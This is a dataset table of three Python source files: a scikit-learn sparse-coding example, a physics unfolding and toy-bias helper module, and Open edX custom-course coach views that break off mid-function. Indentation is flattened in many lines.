| text (string, 12–1.05M) | repo_name (string, 5–86) | path (string, 4–191) | language (string, 1 class) | license (string, 15 classes) | size (int32, 12–1.05M) | keyword (list, 1–23 items) | text_hash (string, 64) |
|---|---|---|---|---|---|---|---|
"""
===========================================
Sparse coding with a precomputed dictionary
===========================================
Transform a signal as a sparse combination of Ricker wavelets. This example
visually compares different sparse coding methods using the
:class:`sklearn.decomposition.SparseCoder` estimator. The Ricker (also known
as Mexican hat or the second derivative of a Gaussian) is not a particularly
good kernel to represent piecewise constant signals like this one. It can
therefore be seen how much adding different widths of atoms matters and it
therefore motivates learning the dictionary to best fit your type of signals.
The richer dictionary on the right is not larger in size, heavier subsampling
is performed in order to stay on the same order of magnitude.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import SparseCoder
def ricker_function(resolution, center, width):
"""Discrete sub-sampled Ricker (Mexican hat) wavelet"""
x = np.linspace(0, resolution - 1, resolution)
    x = ((2 / (np.sqrt(3 * width) * np.pi ** 0.25))
         * (1 - ((x - center) ** 2 / width ** 2))
         * np.exp((-(x - center) ** 2) / (2 * width ** 2)))
return x
def ricker_matrix(width, resolution, n_components):
"""Dictionary of Ricker (Mexican hat) wavelets"""
centers = np.linspace(0, resolution - 1, n_components)
D = np.empty((n_components, resolution))
for i, center in enumerate(centers):
D[i] = ricker_function(resolution, center, width)
D /= np.sqrt(np.sum(D ** 2, axis=1))[:, np.newaxis]
return D
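# Quick self-check (illustrative, not part of the original example): after the
# normalisation above, every dictionary atom should have unit L2 norm.
_D_check = ricker_matrix(width=10, resolution=64, n_components=8)
assert np.allclose(np.sum(_D_check ** 2, axis=1), 1.0)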
resolution = 1024
subsampling = 3 # subsampling factor
width = 100
n_components = resolution // subsampling
# Compute a wavelet dictionary
D_fixed = ricker_matrix(width=width, resolution=resolution,
n_components=n_components)
D_multi = np.r_[tuple(ricker_matrix(width=w, resolution=resolution,
                                    n_components=n_components // 5)
                for w in (10, 50, 100, 500, 1000))]
# Generate a signal
y = np.linspace(0, resolution - 1, resolution)
first_quarter = y < resolution / 4
y[first_quarter] = 3.
y[np.logical_not(first_quarter)] = -1.
# List the different sparse coding methods in the following format:
# (title, transform_algorithm, transform_alpha,
#  transform_n_nonzero_coefs, color)
estimators = [('OMP', 'omp', None, 15, 'navy'),
('Lasso', 'lasso_cd', 2, None, 'turquoise'), ]
lw = 2
plt.figure(figsize=(13, 6))
for subplot, (D, title) in enumerate(zip((D_fixed, D_multi),
('fixed width', 'multiple widths'))):
plt.subplot(1, 2, subplot + 1)
plt.title('Sparse coding against %s dictionary' % title)
plt.plot(y, lw=lw, linestyle='--', label='Original signal')
# Do a wavelet approximation
for title, algo, alpha, n_nonzero, color in estimators:
coder = SparseCoder(dictionary=D, transform_n_nonzero_coefs=n_nonzero,
transform_alpha=alpha, transform_algorithm=algo)
x = coder.transform(y.reshape(1, -1))
density = len(np.flatnonzero(x))
x = np.ravel(np.dot(x, D))
squared_error = np.sum((y - x) ** 2)
plt.plot(x, color=color, lw=lw,
label='%s: %s nonzero coefs,\n%.2f error'
% (title, density, squared_error))
# Soft thresholding debiasing
coder = SparseCoder(dictionary=D, transform_algorithm='threshold',
transform_alpha=20)
x = coder.transform(y.reshape(1, -1))
_, idx = np.where(x != 0)
    x[0, idx], _, _, _ = np.linalg.lstsq(D[idx, :].T, y, rcond=None)
x = np.ravel(np.dot(x, D))
squared_error = np.sum((y - x) ** 2)
plt.plot(x, color='darkorange', lw=lw,
label='Thresholding w/ debiasing:\n%d nonzero coefs, %.2f error'
% (len(idx), squared_error))
plt.axis('tight')
plt.legend(shadow=False, loc='best')
plt.subplots_adjust(.04, .07, .97, .90, .09, .2)
plt.show()
| RPGOne/Skynet | scikit-learn-0.18.1/examples/decomposition/plot_sparse_coding.py | Python | bsd-3-clause | 4,038 | ["Gaussian"] | 3ccd5d38db8a80c4dc83db76588fd7d36ab3c8e6cb947e6ae5d14ba4977b3740 |
try:
  import ROOT
except ImportError:
  pass
import array
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from Unfolder.Histogram import H1D, H2D, plotH1D, plotH2D, plotH1DWithText, plotH2DWithText, plotH1DLines
'''
Helpers to scan a TUnfold object's L-curve for the optimal regularisation
strength tau, and to compare different unfolding methods.
'''
def printLcurve(tunfolder, fname):
nScan = 30
tauMin = 0
tauMax = 0
iBest = -1
logTauX = ROOT.TSpline3()
logTauY = ROOT.TSpline3()
lCurve = ROOT.TGraph()
iBest = tunfolder.ScanLcurve(nScan,tauMin,tauMax,lCurve, logTauX, logTauY)
tau = tunfolder.GetTau()
print("With TUnfold: Lcurve scan chose tau =", tau)
c = ROOT.TCanvas()
t = ROOT.Double()
x = ROOT.Double()
y = ROOT.Double()
logTauX.GetKnot(iBest,t,x)
logTauY.GetKnot(iBest,t,y)
bestLcurve = ROOT.TGraph(1, array.array('d',[x]), array.array('d', [y]))
lCurve.Draw("AC")
bestLcurve.SetMarkerColor(ROOT.kRed+2)
bestLcurve.Draw("*")
c.Print(fname)
return tau
'''
Use this to run the TUnfold unfolding method.
For example:
tunfolder = getTUnfolder(f_bkg, f_mig, f_eff, f_data, regMode = ROOT.TUnfold.kRegModeNone)
# no regularization
#printLcurve(tunfolder, "tunfold_lcurve.png")
tunfolder.DoUnfold(0)
tunfold_mig = H1D(tunfolder.GetOutput("tunfold_result"))
tunfold_result = tunfold_mig/eff
comparePlot([f_data, f_data - f_bkg, truth, tunfold_result], ["Data", "Data - bkg", "Particle-level", "TUnfold"], luminosity*1e-3, True, "fb/GeV", fname = "plotTUnfold.png")
'''
def getTUnfolder(bkg, mig, eff, data, regMode = None, normMode = None):
  if regMode is None: regMode = ROOT.TUnfold.kRegModeDerivative
  if normMode is None: normMode = ROOT.TUnfold.kEConstraintArea
  tunfolder = ROOT.TUnfoldDensity(mig.T().toROOT("tunfold_mig"), ROOT.TUnfold.kHistMapOutputVert, regMode, normMode, ROOT.TUnfoldDensity.kDensityModeNone)
bkg_noerr = H1D(bkg)
for k in range(0, len(bkg.err)):
bkg_noerr.err[k] = 0
dataBkgSub = data - bkg_noerr
tunfolder.SetInput(dataBkgSub.toROOT("data_minus_bkg"), 0)
return tunfolder
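# Example wiring (sketch, using the functions above): scan the L-curve for an
# optimal tau instead of unfolding with a fixed regularisation strength.
#   tunfolder = getTUnfolder(f_bkg, f_mig, f_eff, f_data)
#   tau = printLcurve(tunfolder, "tunfold_lcurve.png")
#   tunfolder.DoUnfold(tau)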
'''
Use this to plot the histograms in listHist with the legends in listLegend.
'''
def comparePlot(listHist, listLegend, f = 1.0, normaliseByBinWidth = True, units = "fb", logy = False, fname = "comparePlot.png"):
fig = plt.figure(figsize=(10, 10))
newListHist = []
for item in listHist:
newListHist.append(f*item)
if normaliseByBinWidth:
newListHist[-1].overBinWidth()
sty = ['rv', 'bo', 'g^', 'mo', 'cv', 'ks']
siz = [14, 12, 10, 8, 6, 4]
c = 0
ymax = 0
ymin = 1e10
for item in newListHist:
ma = np.amax(item.val)
ymax = np.amax([ymax, ma])
mi = np.amin(item.val)
ymin = np.amin([ymin, mi])
plt.errorbar(item.x, item.val, [item.err_dw**0.5, item.err_up**0.5], item.x_err, fmt = sty[c], linewidth=2, label = listLegend[c], markersize=siz[c])
c += 1
plt.legend()
if units != "":
plt.ylabel("Differential cross section ["+units+"]")
else:
plt.ylabel("Events")
plt.xlabel("Observable")
if logy:
plt.ylim([ymin*0.8, ymax*2])
ax = plt.gca()
ax.set_yscale('log')
else:
ax = plt.gca()
ax.set_yscale('linear')
plt.ylim([0, ymax*1.2])
plt.tight_layout()
plt.savefig(fname)
plt.close()
'''
This returns a migration-corrected object from RooUnfold using the D'Agostini unfolding procedure.
Here is an example of how to use it:
dagostini_result = getDAgostini(bkg, mig, eff, data)
comparePlot([data, data - bkg, truth, dagostini_result], ["Data", "Data - bkg", "Particle-level", "D'Agostini"], luminosity*1e-3, True, "fb/GeV", fname = "plotDAgostini.png")
'''
def getDAgostini(bkg, mig, eff, data, nIter = 1):
reco = (mig.project('y') + bkg).toROOT("reco_rp")
reco.SetDirectory(0)
truth = (mig.project('x')/eff).toROOT("truth_p")
truth.SetDirectory(0)
m = mig.T().toROOT("m")
m.SetDirectory(0)
unf_response = ROOT.RooUnfoldResponse(reco, truth, m)
dataBkgSub = data # - bkg
dd = dataBkgSub.toROOT("dataBkgSub_dagostini")
dd.SetDirectory(0)
dagostini = ROOT.RooUnfoldBayes(unf_response, dd, int(nIter))
dagostini.SetVerbose(-1)
dagostini_hreco = dagostini.Hreco()
dagostini_hreco.SetDirectory(0)
del dagostini
del unf_response
del m
r = H1D(dagostini_hreco)
del dagostini_hreco
return r
'''
Use model to get pseudo-data from toy experiments.
'''
def getDataFromModel(bkg, mig, eff):
truth = mig.project('x')/eff
response_noeff = H2D(mig) # = P(r|t) = Mtr/sum_k=1^Nr Mtk
for i in range(0, mig.shape[0]): # for each truth bin
rsum = 0.0
for j in range(0, mig.shape[1]): # for each reco bin
rsum += mig.val[i, j] # calculate the sum of all reco bins in the same truth bin
for j in range(0, mig.shape[1]): # for each reco bin
response_noeff.val[i, j] = mig.val[i, j]/rsum
data = H1D(bkg) # original bkg histogram is ignored: only used to clone X axis
# simulate background
for j in range(0, len(bkg.val)): # j is the reco bin
bv = bkg.val[j]
if bv < 0: bv = 0
bkgCount = np.random.poisson(bv) # this simulates a counting experiment for the bkg
data.val[j] = bkgCount # overwrite background so that we use a Poisson
data.err[j] = bkgCount
# for each truth bin
for i in range(0, len(truth.val)): # i is the truth bin
trueCount = np.random.poisson(truth.val[i]) # this simulates a counting experiment for the truth
#trueCount = int(truth.val[i]) # dirac delta pdf for the truth distribution
# calculate cumulative response for bin i
# C(k|i) = sum_l=0^k P(r=l|t=i)
C = np.zeros(len(bkg.val))
for k in range(0, len(bkg.val)):
for l in range(0, k+1):
C[k] += response_noeff.val[i, l]
# a uniform random number is between 0 and C[0] with prob. response_noeff.val[i, 0]
# it is between C[0] and C[1] with prob. response_noeff.val[i, 1], etc.
for n in range(0, trueCount): # number of experiments is the count in the truth bin
# simulate efficiency by rejecting events with efficiency eff.val[i]
if np.random.uniform(0, 1) > eff.val[i]:
continue
# find the reco bin using the migration matrix mig
# we know that the probability of getting reco bin j given that we are in truth bin i is:
# P(r=j|t=i) = response_noeff.val[i, j]
# first throw a random number between 0 and 1
rn = np.random.uniform(0, 1)
recoBin = len(bkg.val) - 1 # set it to the last bin
for k in range(0, len(bkg.val)): # loop over reco bins and get where the random number is in the cum. distribution
if rn >= C[k]: # if the random number is bigger than the cum. distribution boundary
# keep going as we are not yet at the boundary
continue
# if the random number is smaller than the cum. dist., we have already crossed the boundary
# stop and set the reco bin
recoBin = k
break
data.val[recoBin] += 1
data.err[recoBin] += 1
return data
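# A vectorised sketch of the same toy generation (assumes the H1D interface
# used above): the per-event loops in getDataFromModel implement inverse-CDF
# sampling, which numpy can do per truth bin with cumsum/searchsorted.
# Statistically equivalent, but much faster for large counts.
def getDataFromModelFast(bkg, mig, eff):
  truth = mig.project('x')/eff
  data = H1D(bkg)
  # Poisson background counts (negative expectations clipped to zero)
  data.val = np.random.poisson(np.clip(bkg.val, 0, None)).astype(float)
  data.err = np.copy(data.val)
  for i in range(mig.shape[0]): # for each truth bin
    C = np.cumsum(mig.val[i, :])
    if C[-1] <= 0:
      continue
    C /= C[-1] # cumulative P(r <= k | t = i)
    trueCount = np.random.poisson(truth.val[i])
    # fold the per-event efficiency rejection into a single binomial draw
    nPass = np.random.binomial(trueCount, min(max(eff.val[i], 0.0), 1.0))
    recoBins = np.searchsorted(C, np.random.uniform(0, 1, nPass))
    np.add.at(data.val, recoBins, 1)
    np.add.at(data.err, recoBins, 1)
  return data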
'''
Estimate the bias of the unfolding using toy experiments: throw N pseudo-data
sets from the model, unfold each one, and compare the results with the truth.
'''
def getBiasFromToys(unfoldFunction, alpha, N, bkg, mig, eff, truth):
fitted = np.zeros((N, len(truth.val)))
#fitted2 = np.zeros((N, len(truth.val)))
bias = np.zeros(len(truth.val))
bias_norm = np.zeros(N)
import sys
for k in range(0, N):
if k % 100 == 0:
print("getBiasFromToys: Throwing toy experiment {0}/{1}\r".format(k, N))
sys.stdout.flush()
pseudo_data = getDataFromModel(bkg, mig, eff)
unfolded = unfoldFunction(alpha, pseudo_data)
fitted[k, :] = (unfolded.val - truth.val)
bias_norm[k] = np.sum(unfolded.val - truth.val)
#fitted2[k, :] = unfolded.val
#if k % 500 == 0 and k > 0:
# f = plt.figure()
# plt.errorbar(truth.x, truth.val, np.sqrt(truth.val), truth.x_err, fmt = "ro", markersize = 10, label = "Truth")
# for l in range(k-10, k):
# plt.errorbar(unfolded.x, fitted2[l, :], np.sqrt(fitted2[l, :]), truth.x_err, fmt = "bv", markersize = 10, label = "Unfolded test %d" % l)
# plt.legend(loc = "upper right")
# plt.show()
# plt.close()
  print("")
# systematic bias
bias_syst = np.mean(np.abs(unfoldFunction(alpha, mig.project('y') + bkg).val - truth.val))
bias = np.mean(fitted, axis = 0)
bias_std = np.std(fitted, axis = 0, ddof = 1)
bias_norm_mean = np.mean(bias_norm)
bias_norm_std = np.std(bias_norm, ddof = 1)
bias_binsum = np.mean(np.abs(bias))
bias_std_binsum = np.mean(bias_std)
bias_chi2 = np.mean(np.power(bias/bias_std, 2))
#print "bias mean = ", np.mean(fitted, axis = 0), ", bias std = ", np.std(fitted, axis = 0)
return [bias_binsum, bias_std_binsum, bias_chi2, bias_norm_mean, bias_norm_std, bias_syst]
'''
Scan a general regularisation parameter to minimise bias^2 over variance.
unfoldFunction receives the reg. parameter and a data vector to unfold, and
returns the unfolded spectrum.
'''
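# Example wiring (sketch): any unfolding method can be scanned by wrapping it
# in a function of (reg. parameter, data). For D'Agostini the parameter is
# the number of iterations:
#   unfold = lambda alpha, data: getDAgostini(bkg, mig, eff, data, nIter = int(alpha))
#   best = scanRegParameter(unfold, bkg, mig, eff, truth, N = 500, rangeAlpha = np.arange(1, 11))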
def scanRegParameter(unfoldFunction, bkg, mig, eff, truth, N = 1000, rangeAlpha = np.arange(0.0, 1.0, 1e-3), fname = "scanRegParameter.png", fname_chi2 = "scanRegParameter_chi2.png", fname_norm = "scanRegParameter_norm.png"):
bias = np.zeros(len(rangeAlpha))
bias_std = np.zeros(len(rangeAlpha))
bias_chi2 = np.zeros(len(rangeAlpha))
bias_norm = np.zeros(len(rangeAlpha))
bias_norm_std = np.zeros(len(rangeAlpha))
bias_syst = np.zeros(len(rangeAlpha))
minBias = 1e10
bestAlpha = 0
bestChi2 = 0
bestI = 0
import sys
for i in range(0, len(rangeAlpha)):
#if i % 100 == 0:
print("scanRegParameter: parameter = ", rangeAlpha[i], " / ", rangeAlpha[-1])
sys.stdout.flush()
bias[i], bias_std[i], bias_chi2[i], bias_norm[i], bias_norm_std[i], bias_syst[i] = getBiasFromToys(unfoldFunction, rangeAlpha[i], N, bkg, mig, eff, truth)
print(" -- --> scanRegParameter: parameter = ", rangeAlpha[i], " / ", rangeAlpha[-1], " with chi2 = ", bias_chi2[i], ", mean and std = ", bias[i], bias_std[i])
if np.abs(bias_chi2[i] - 0.5) < minBias:
minBias = np.abs(bias_chi2[i] - 0.5)
bestAlpha = rangeAlpha[i]
bestChi2 = bias_chi2[i]
bestI = i
fig = plt.figure(figsize=(10, 10))
plt_bias = H1D(bias)
plt_bias.val = bias
plt_bias.err = np.zeros(len(rangeAlpha))
plt_bias.x = rangeAlpha
plt_bias.x_err = np.zeros(len(rangeAlpha))
plt_bias_e = H1D(bias)
plt_bias_e.val = bias_std
plt_bias_e.err = np.zeros(len(rangeAlpha))
plt_bias_e.x = rangeAlpha
plt_bias_e.x_err = np.zeros(len(rangeAlpha))
plt_bias_syst = H1D(bias)
plt_bias_syst.val = bias_syst
plt_bias_syst.err = np.zeros(len(rangeAlpha))
plt_bias_syst.x = rangeAlpha
plt_bias_syst.x_err = np.zeros(len(rangeAlpha))
#plotH1DLines({r"$E_{\mathrm{bins}}[|E_{\mathrm{toys}}[\mathrm{bias}]|]$": plt_bias, r"$E_{\mathrm{bins}}[\sqrt{\mathrm{Var}_{\mathrm{toys}}[\mathrm{bias}]}]$": plt_bias_e, r"$E_{\mathrm{bins}}[|\mathrm{only \;\; syst. \;\; bias}|]$": plt_bias_syst}, "Regularization parameter", "Bias", "", fname)
plotH1DLines({r"$E_{\mathrm{bins}}[|E_{\mathrm{toys}}[\mathrm{bias}]|]$": plt_bias, r"$E_{\mathrm{bins}}[\sqrt{\mathrm{Var}_{\mathrm{toys}}[\mathrm{bias}]}]$": plt_bias_e}, "Regularization parameter", "Bias", "", fname)
plt_bias_norm = H1D(bias)
plt_bias_norm.val = bias_norm
plt_bias_norm.err = np.power(bias_norm_std, 2)
plt_bias_norm.x = rangeAlpha
plt_bias_norm.x_err = np.zeros(len(rangeAlpha))
plt_bias_norm_e = H1D(bias)
plt_bias_norm_e.val = bias_norm_std
plt_bias_norm_e.err = np.zeros(len(rangeAlpha))
plt_bias_norm_e.x = rangeAlpha
plt_bias_norm_e.x_err = np.zeros(len(rangeAlpha))
plotH1DLines({r"$E_{\mathrm{toys}}[\mathrm{norm. \;\; bias}]$": plt_bias_norm, r"$\sqrt{\mathrm{Var}_{\mathrm{toys}}[\mathrm{norm. \;\; bias}]}$": plt_bias_norm_e}, "Regularization parameter", "Normalisation bias", "", fname_norm)
plt_bias_chi2 = H1D(bias_chi2)
plt_bias_chi2.val = bias_chi2
plt_bias_chi2.err = np.ones(len(rangeAlpha))*np.sqrt(float(len(truth.val))/float(N)) # error in chi^2 considering errors in the mean of std/sqrt(N)
plt_bias_chi2.x = rangeAlpha
plt_bias_chi2.x_err = np.zeros(len(rangeAlpha))
plt_cte = H1D(plt_bias_chi2)
plt_cte.val = 0.5*np.ones(len(rangeAlpha))
plt_cte.err = np.zeros(len(rangeAlpha))
plotH1DLines({r"$E_{\mathrm{bins}}[E_{\mathrm{toys}}[\mathrm{bias}]^2/\mathrm{Var}_{\mathrm{toys}}[\mathrm{bias}]]$": plt_bias_chi2, "0.5": plt_cte}, "Regularisation parameter", r"Bias $\mathrm{mean}^2/\mathrm{variance}$", "", fname_chi2)
return [bestAlpha, bestChi2, bias[bestI], bias_std[bestI], bias_norm[bestI], bias_norm_std[bestI]]
| daniloefl/Unfolder | Unfolder/ComparisonHelpers.py | Python | gpl-3.0 | 12,462 | ["DIRAC"] | d163846baed4707df19b064a12c5b5760afdbb9504aa29150e32a2ea4b69ae0e |
"""
Views related to the Custom Courses feature.
"""
import csv
import datetime
import functools
import json
import logging
from copy import deepcopy
from cStringIO import StringIO
import pytz
from ccx_keys.locator import CCXLocator
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.db import transaction
from django.http import Http404, HttpResponse, HttpResponseForbidden
from django.shortcuts import redirect
from django.utils.translation import ugettext as _
from django.views.decorators.cache import cache_control
from django.views.decorators.csrf import ensure_csrf_cookie
from opaque_keys.edx.keys import CourseKey
from courseware.access import has_access
from courseware.courses import get_course_by_id
from courseware.field_overrides import disable_overrides
from django_comment_common.models import FORUM_ROLE_ADMINISTRATOR, assign_role
from django_comment_common.utils import seed_permissions_roles
from edxmako.shortcuts import render_to_response
from lms.djangoapps.ccx.models import CustomCourseForEdX
from lms.djangoapps.ccx.overrides import (
bulk_delete_ccx_override_fields,
clear_ccx_field_info_from_ccx_map,
get_override_for_ccx,
override_field_for_ccx
)
from lms.djangoapps.ccx.utils import (
add_master_course_staff_to_ccx,
assign_staff_role_to_ccx,
ccx_course,
ccx_students_enrolling_center,
get_ccx_by_ccx_id,
get_ccx_creation_dict,
get_ccx_for_coach,
get_date,
get_enrollment_action_and_identifiers,
parse_date,
)
from lms.djangoapps.grades.course_grade_factory import CourseGradeFactory
from lms.djangoapps.instructor.enrollment import enroll_email, get_email_params
from lms.djangoapps.instructor.views.gradebook_api import get_grade_book_page
from student.models import CourseEnrollment
from student.roles import CourseCcxCoachRole
from xmodule.modulestore.django import SignalHandler
log = logging.getLogger(__name__)
TODAY = datetime.datetime.today # for patching in tests
def coach_dashboard(view):
    """
    View decorator which enforces that the user has the CCX coach role on the
    given course, and translates the course_id from the Django route into a
    course object.
    """
@functools.wraps(view)
def wrapper(request, course_id):
"""
Wraps the view function, performing access check, loading the course,
and modifying the view's call signature.
"""
course_key = CourseKey.from_string(course_id)
ccx = None
if isinstance(course_key, CCXLocator):
ccx_id = course_key.ccx
try:
ccx = CustomCourseForEdX.objects.get(pk=ccx_id)
except CustomCourseForEdX.DoesNotExist:
raise Http404
if ccx:
course_key = ccx.course_id
course = get_course_by_id(course_key, depth=None)
if not course.enable_ccx:
raise Http404
else:
is_staff = has_access(request.user, 'staff', course)
is_instructor = has_access(request.user, 'instructor', course)
if is_staff or is_instructor:
                # if the user is staff or an instructor, they can view the ccx coach dashboard.
return view(request, course, ccx)
else:
# if there is a ccx, we must validate that it is the ccx for this coach
role = CourseCcxCoachRole(course_key)
if not role.has_user(request.user):
return HttpResponseForbidden(_('You must be a CCX Coach to access this view.'))
elif ccx is not None:
coach_ccx = get_ccx_by_ccx_id(course, request.user, ccx.id)
if coach_ccx is None:
return HttpResponseForbidden(
_('You must be the coach for this ccx to access this view')
)
return view(request, course, ccx)
return wrapper
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def dashboard(request, course, ccx=None):
"""
Display the CCX Coach Dashboard.
"""
    # right now, we can only have one ccx per user and course,
    # so if no ccx is passed in, we can safely redirect to that one
if ccx is None:
ccx = get_ccx_for_coach(course, request.user)
if ccx:
url = reverse(
'ccx_coach_dashboard',
kwargs={'course_id': CCXLocator.from_course_locator(course.id, unicode(ccx.id))}
)
return redirect(url)
context = {
'course': course,
'ccx': ccx,
}
context.update(get_ccx_creation_dict(course))
if ccx:
ccx_locator = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
# At this point we are done with verification that current user is ccx coach.
assign_staff_role_to_ccx(ccx_locator, request.user, course.id)
schedule = get_ccx_schedule(course, ccx)
grading_policy = get_override_for_ccx(
ccx, course, 'grading_policy', course.grading_policy)
context['schedule'] = json.dumps(schedule, indent=4)
context['save_url'] = reverse(
'save_ccx', kwargs={'course_id': ccx_locator})
context['ccx_members'] = CourseEnrollment.objects.filter(course_id=ccx_locator, is_active=True)
context['gradebook_url'] = reverse(
'ccx_gradebook', kwargs={'course_id': ccx_locator})
context['grades_csv_url'] = reverse(
'ccx_grades_csv', kwargs={'course_id': ccx_locator})
context['grading_policy'] = json.dumps(grading_policy, indent=4)
context['grading_policy_url'] = reverse(
'ccx_set_grading_policy', kwargs={'course_id': ccx_locator})
with ccx_course(ccx_locator) as course:
context['course'] = course
else:
context['create_ccx_url'] = reverse(
'create_ccx', kwargs={'course_id': course.id})
return render_to_response('ccx/coach_dashboard.html', context)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def create_ccx(request, course, ccx=None):
"""
Create a new CCX
"""
name = request.POST.get('name')
if hasattr(course, 'ccx_connector') and course.ccx_connector:
        # if the ccx connector url is set in course settings, inform the user
        # that a ccx can only be created via the ccx connector url
context = get_ccx_creation_dict(course)
messages.error(request, context['use_ccx_con_error_message'])
return render_to_response('ccx/coach_dashboard.html', context)
# prevent CCX objects from being created for deprecated course ids.
if course.id.deprecated:
messages.error(request, _(
"You cannot create a CCX from a course using a deprecated id. "
"Please create a rerun of this course in the studio to allow "
"this action."))
url = reverse('ccx_coach_dashboard', kwargs={'course_id': course.id})
return redirect(url)
ccx = CustomCourseForEdX(
course_id=course.id,
coach=request.user,
display_name=name)
ccx.save()
# Make sure start/due are overridden for entire course
start = TODAY().replace(tzinfo=pytz.UTC)
override_field_for_ccx(ccx, course, 'start', start)
override_field_for_ccx(ccx, course, 'due', None)
    # Enforce a static limit on the maximum number of students that can be enrolled
override_field_for_ccx(ccx, course, 'max_student_enrollments_allowed', settings.CCX_MAX_STUDENTS_ALLOWED)
# Hide anything that can show up in the schedule
hidden = 'visible_to_staff_only'
for chapter in course.get_children():
override_field_for_ccx(ccx, chapter, hidden, True)
for sequential in chapter.get_children():
override_field_for_ccx(ccx, sequential, hidden, True)
for vertical in sequential.get_children():
override_field_for_ccx(ccx, vertical, hidden, True)
ccx_id = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
# Create forum roles
seed_permissions_roles(ccx_id)
# Assign administrator forum role to CCX coach
assign_role(ccx_id, request.user, FORUM_ROLE_ADMINISTRATOR)
url = reverse('ccx_coach_dashboard', kwargs={'course_id': ccx_id})
# Enroll the coach in the course
email_params = get_email_params(course, auto_enroll=True, course_key=ccx_id, display_name=ccx.display_name)
enroll_email(
course_id=ccx_id,
student_email=request.user.email,
auto_enroll=True,
email_students=True,
email_params=email_params,
)
assign_staff_role_to_ccx(ccx_id, request.user, course.id)
add_master_course_staff_to_ccx(course, ccx_id, ccx.display_name)
# using CCX object as sender here.
responses = SignalHandler.course_published.send(
sender=ccx,
course_key=CCXLocator.from_course_locator(course.id, unicode(ccx.id))
)
for rec, response in responses:
log.info('Signal fired when course is published. Receiver: %s. Response: %s', rec, response)
return redirect(url)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def save_ccx(request, course, ccx=None):
"""
Save changes to CCX.
"""
if not ccx:
raise Http404
def override_fields(parent, data, graded, earliest=None, ccx_ids_to_delete=None):
"""
Recursively apply CCX schedule data to CCX by overriding the
`visible_to_staff_only`, `start` and `due` fields for units in the
course.
"""
if ccx_ids_to_delete is None:
ccx_ids_to_delete = []
blocks = {
str(child.location): child
for child in parent.get_children()}
        for unit in data:
            block = blocks[unit['location']]
            due = None  # chapters have no due date; reset per unit to avoid stale values
override_field_for_ccx(
ccx, block, 'visible_to_staff_only', unit['hidden'])
start = parse_date(unit['start'])
if start:
if not earliest or start < earliest:
earliest = start
override_field_for_ccx(ccx, block, 'start', start)
else:
ccx_ids_to_delete.append(get_override_for_ccx(ccx, block, 'start_id'))
clear_ccx_field_info_from_ccx_map(ccx, block, 'start')
            # Only subsections (aka sequentials) and units (aka verticals) have due dates.
            if 'due' in unit:
due = parse_date(unit['due'])
if due:
override_field_for_ccx(ccx, block, 'due', due)
else:
ccx_ids_to_delete.append(get_override_for_ccx(ccx, block, 'due_id'))
clear_ccx_field_info_from_ccx_map(ccx, block, 'due')
else:
                # Sections (aka chapters) have no due date.
ccx_ids_to_delete.append(get_override_for_ccx(ccx, block, 'due_id'))
clear_ccx_field_info_from_ccx_map(ccx, block, 'due')
if not unit['hidden'] and block.graded:
graded[block.format] = graded.get(block.format, 0) + 1
children = unit.get('children', None)
# For a vertical, override start and due dates of all its problems.
if unit.get('category', None) == u'vertical':
for component in block.get_children():
                    # copy the vertical's start and due dates into the component
if start:
override_field_for_ccx(ccx, component, 'start', start)
if due:
override_field_for_ccx(ccx, component, 'due', due)
if children:
override_fields(block, children, graded, earliest, ccx_ids_to_delete)
return earliest, ccx_ids_to_delete
graded = {}
earliest, ccx_ids_to_delete = override_fields(course, json.loads(request.body), graded, [])
bulk_delete_ccx_override_fields(ccx, ccx_ids_to_delete)
if earliest:
override_field_for_ccx(ccx, course, 'start', earliest)
# Attempt to automatically adjust grading policy
changed = False
policy = get_override_for_ccx(
ccx, course, 'grading_policy', course.grading_policy
)
policy = deepcopy(policy)
grader = policy['GRADER']
for section in grader:
count = graded.get(section.get('type'), 0)
if count < section.get('min_count', 0):
changed = True
section['min_count'] = count
if changed:
override_field_for_ccx(ccx, course, 'grading_policy', policy)
# using CCX object as sender here.
responses = SignalHandler.course_published.send(
sender=ccx,
course_key=CCXLocator.from_course_locator(course.id, unicode(ccx.id))
)
for rec, response in responses:
log.info('Signal fired when course is published. Receiver: %s. Response: %s', rec, response)
return HttpResponse(
json.dumps({
'schedule': get_ccx_schedule(course, ccx),
'grading_policy': json.dumps(policy, indent=4)}),
content_type='application/json',
)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def set_grading_policy(request, course, ccx=None):
"""
Set grading policy for the CCX.
"""
if not ccx:
raise Http404
override_field_for_ccx(
ccx, course, 'grading_policy', json.loads(request.POST['policy']))
# using CCX object as sender here.
responses = SignalHandler.course_published.send(
sender=ccx,
course_key=CCXLocator.from_course_locator(course.id, unicode(ccx.id))
)
for rec, response in responses:
log.info('Signal fired when course is published. Receiver: %s. Response: %s', rec, response)
url = reverse(
'ccx_coach_dashboard',
kwargs={'course_id': CCXLocator.from_course_locator(course.id, unicode(ccx.id))}
)
return redirect(url)
def get_ccx_schedule(course, ccx):
"""
Generate a JSON serializable CCX schedule.
"""
    def visit(node, depth=1):
        """
        Recursive generator function which yields CCX schedule nodes.
        We convert dates to strings to get them ready for use by the js date
        widgets, which use text inputs.
        Only nodes visible to students are visited; children of hidden nodes
        are skipped as well.
        Dates:
        Only the start date is applicable to a section. If the CCX coach did
        not override it, the start date is taken from the master course.
        Both start and due dates are applicable to a subsection (aka
        sequential). If the CCX coach did not override these dates, they are
        taken from the corresponding subsection in the master course.
        A unit inherits its start and due dates from its subsection. If the
        CCX coach did not override these dates, they are taken from the
        corresponding subsection in the master course.
        """
for child in node.get_children():
# in case the children are visible to staff only, skip them
if child.visible_to_staff_only:
continue
hidden = get_override_for_ccx(
ccx, child, 'visible_to_staff_only',
child.visible_to_staff_only)
start = get_date(ccx, child, 'start')
            if depth > 1:
                # Subsections have both start and due dates; units inherit
                # dates from their subsection.
                if depth == 2:
                    due = get_date(ccx, child, 'due')
                elif depth == 3:
                    # Fall back to the subsection's dates if the unit has no
                    # overridden dates.
                    due = get_date(ccx, child, 'due', node)
